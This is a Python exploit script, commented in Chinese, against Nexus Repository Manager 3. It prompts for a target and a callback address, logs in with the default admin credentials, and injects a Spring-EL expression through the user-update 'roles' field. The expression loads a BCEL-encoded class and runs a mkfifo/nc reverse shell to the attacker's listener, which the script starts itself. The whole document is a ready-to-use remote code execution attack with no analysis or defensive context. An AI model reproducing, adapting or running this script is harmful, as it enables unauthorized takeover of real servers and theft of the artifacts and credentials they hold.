import requests
import json
import subprocess
import threading

# === 用户交互式输入 ===
target_ip = input("请输入目标 Nexus3 IP（例如 192.168.109.4）: ").strip()
target_port = input("请输入目标 Nexus3 端口（例如 60357）: ").strip()
callback_ip = input("请输入本机监听 IP（例如 192.168.109.10）: ").strip()
callback_port = input("请输入本机监听端口（例如 4444）: ").strip()

HOST = f"http://{target_ip}:{target_port}"
CALLBACK_IP = callback_ip
CALLBACK_PORT = callback_port

USERNAME_B64 = "YWRtaW4%3D"
PASSWORD_B64 = "YWRtaW4xMjM%3D"

# === 完整 BCEL 字符串（务必为一整行） ===
BCEL_STRING = """$$BCEL$$$l$8b$I$A$A$A$A$A$A$ff$8dSMS$d3P$U$3d$8f$b6I$J$v$U$K$94$60QA$c5P$uU$E$3fZD$Fq$86$Z$40$87$3a$3a$ZWi$fa$c0$60I$3ai$ca$b0r$e5$7fq$ab$9b$d6$91$d1$a5$L$7f$87$L$fd$P$8ex_Z$3e$8a$ca$d8I$df$cb$bb$f7$9c$7b$eeG$de$d7_$l$3f$D$98$c5$p$F$j$I$c9$I$ab$88$40b$88o$9b$bbf$b6l$3a$5b$d9$c7$c5mn$f9$M$d2$bc$ed$d8$fe$CCH$9fx$a6$m$8aN$Z$8a$8a$$$a8$M$bd$c7$f0$8d$9a$e3$db$3b$9cA$d9$e2$fe$d1a$40$9fX$fd$D$93$97$d1$dd$sU$f0$3d$db$d9$8a$o$ce$mg$8b$b6$93$ad$be$8c$a2$8f$a1$pc$J$c1$7e$V$D$Yd$I$f3$3dn1$e8$fa$8b$d5$d3$dc$fcI$99$t$9ek$f1j$95d$86$Y$G$D$bb$edf$Xk$9b$9b$dc$e3$a5$Nn$96$b8$tc$98A$3b$f4$ad8$95$9aO$91$b8$b9$d3t$xHaD$c6y$V$Xp$b1$ad$ceVp$86n$aa$f3$E$8f$nyXk$7b$c0$bc$C$Nc$a2$bf$97$Y$86$f4$bfBDc$93$b8$o$40$e3$M$89cP3$9b$c0$9f$82$aebBd$p$94$97$3d$cf$f5$9al$Z$93$q$7e$ba$p$8b5$bb$i$U$92FH$E$9fV$91$c55$86$uQJ$ab$b6C$c3$e9o$hN$ab$91$820$a3$e2$Gfi$f4f$a5$c2$9d$SCF$3f$bb$e3m$92A$88$9b$o$c4$z$86$94$bet6$f0$8e$8a$5c$90$97$ef6$9d2$e6$Z$o$7c$d7$y$cf$d0$c8$97$dc$Se$da$p$S$5e$af$ed$U$b9$f7$d4$y$96$c92$fe_$Z$e5$Zb$F$df$b4$5e$ad$99$95$WQY$de$b3x$c5$b7$5d$a7$wc$89$9a$7d$cc9$f2$Q$aa$e0$d6$3c$8b$3f$b2$DJ$90$cc$b4$Ab$Uy$ba1$e2$d7$B$s$ee$M$adw$e94B$3b$a3$3d$92n$80$bd$a7$X$86$FZ$a5$c0$Y$a6u$A$f7$88$o$a0$df$88$s$d3$fe$e6$Dd$e9$TbF$a8$af$a7$60$84$fbz$LFd$b2PGbm$lIc$l$9a1U$c7$b9$GF$h$b8$bc$7e$c2t$b5i$ca$85$f7$916$g$98$caE2ud$8c$9c$f4$F$J$z$a2Iu$5c$8f$xu$cc$3d$7f$7b$f0C$L$ff$cb$f5$5d$8b$d4q$fb$5dP$88$c8t$i$9d$b4F$e9$5b$ed$c2$YTL$n$869t$e3$3e$e2XA$C$W$fa$f1$g$83t$G$f9C$Hd$94d$d0$j$8b$c9H$c9H$GO$g$f8$J$8dl$c3x$d0$aa$7b$91$fe$P$D$95$e5$df$5d$90$g$iv$E$A$A"""

# === 监听线程 ===
def listen_shell():
    print(f"\n[+] 启动监听：nc -lvnp {CALLBACK_PORT}")
    print("[*] 如果目标成功反弹，你将在此终端获得 shell。\n")
    subprocess.call(["nc", "-lvnp", str(CALLBACK_PORT)])

# === 启动监听线程 ===
listener_thread = threading.Thread(target=listen_shell)
listener_thread.start()

# === 登录获取 NXSESSIONID ===
login_url = f"{HOST}/service/rapture/session"
login_headers = {
    "X-Nexus-UI": "true",
    "Referer": f"{HOST}/",
    "Accept-Encoding": "gzip, deflate",
    "Accept-Language": "zh-CN,zh;q=0.9",
    "User-Agent": "Mozilla/5.0",
    "Accept": "*/*",
    "Origin": HOST,
    "X-Requested-With": "XMLHttpRequest",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
}

login_data = f"username={USERNAME_B64}&password={PASSWORD_B64}"

print("\n[+] 正在登录 Nexus3...")
session = requests.Session()
resp = session.post(login_url, headers=login_headers, data=login_data)

if "Set-Cookie" not in resp.headers and resp.status_code != 204:
    print("[-] 登录失败！响应内容：")
    print(resp.text)
    exit()

cookie = session.cookies.get_dict().get("NXSESSIONID", "")
print(f"[+] 登录成功，NXSESSIONID = {cookie}\n")

# === 构造 Spring-EL 注入 payload ===
el_expr = (
    f"${{''.class.forName('com.sun.org.apache.bcel.internal.util.ClassLoader')"
    f".newInstance().loadClass('{BCEL_STRING}')"
    f".newInstance().exec('rm -f /tmp/f;mkfifo /tmp/f;/bin/sh -i < /tmp/f 2>&1 | nc {CALLBACK_IP} {CALLBACK_PORT} > /tmp/f')}}"
)

inject_data = {
    "action": "coreui_User",
    "method": "update",
    "data": [{
        "userId": "admin",
        "version": "10",
        "firstName": "Administrator",
        "lastName": "User1",
        "email": "[email protected]",
        "status": "active",
        "roles": [el_expr]
    }],
    "type": "rpc",
    "tid": 24
}

inject_headers = {
    "Cookie": f"NXSESSIONID={cookie}",
    "Content-Type": "application/json",
    "Origin": HOST,
    "Referer": f"{HOST}/",
    "X-Nexus-UI": "true",
    "User-Agent": "Mozilla/5.0",
    "X-Requested-With": "XMLHttpRequest"
}

print("[+] 正在发送 exploit payload...")
exploit_url = f"{HOST}/service/extdirect"
exploit_resp = session.post(exploit_url, headers=inject_headers, data=json.dumps(inject_data))

print(f"[+] 返回状态码: {exploit_resp.status_code}")
print("[+] 服务器响应:")
print(exploit_resp.text)

# === 等待监听线程结束（即交互 shell） ===
listener_thread.join()